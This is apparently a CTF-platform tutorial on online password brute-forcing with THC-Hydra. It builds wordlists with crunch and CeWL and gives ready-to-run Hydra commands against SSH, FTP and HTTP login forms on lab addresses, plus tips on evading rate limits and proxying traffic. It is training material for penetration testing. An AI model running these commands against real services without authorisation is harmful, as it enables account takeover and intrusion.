THC-Hydra is the fastest and most versatile online brute-force tool. Unlike John the Ripper (which cracks hashes offline), Hydra attacks live network services directly. It supports over 50 protocols.
A brute-force attack is only as good as its wordlist.
# 1. Rockyou (The absolute classic):
/usr/share/wordlists/rockyou.txt
# 2. Custom generation with Crunch (e.g., 8 chars, lowercase + numbers):
crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt
# 3. CeWL (Scrape a website to build a context-specific wordlist):
cewl -d 2 -m 5 -w corp_words.txt https://megacorp.local# Known username (admin) and password list (-P uppercase):
hydra -l admin -P rockyou.txt ssh://192.168.1.10
# User list (-L) and password list (-P) (Cluster attack):
hydra -L users.txt -P rockyou.txt ftp://192.168.1.10
# Non-standard port (-s) and multiple threads (-t):
hydra -l root -P pass.txt -s 2222 -t 16 ssh://192.168.1.10Attacking a web form is complex. The http-post-form module syntax requires 3 parts separated by colons (:): Path, Post Data (with ^USER^ and ^PASS^ placeholders), and the Failure String.
# Full HTTP POST attack example:
hydra -l admin -P rockyou.txt 192.168.1.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:Login failed"
# Adding session cookies (required for authenticated portals):
hydra -l admin -P pass.txt 192.168.1.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:Login failed:H=Cookie: PHPSESSID=abc123"Building the Hydra command to attack web forms is an art. We've intercepted a POST request to an admin panel. Your mission is to analyze the HTTP structure and write the exact command to launch the attack.
>_ START CTF 11 CHALLENGE# Add wait time between attempts to evade rate limiting (in seconds):
hydra -l admin -P pass.txt -W 3 ssh://192.168.1.10
# Route through a Proxy (e.g., Burp Suite for debugging):
export HYDRA_PROXY_HTTP="http://127.0.0.1:8080"
# Resume an interrupted session:
hydra -R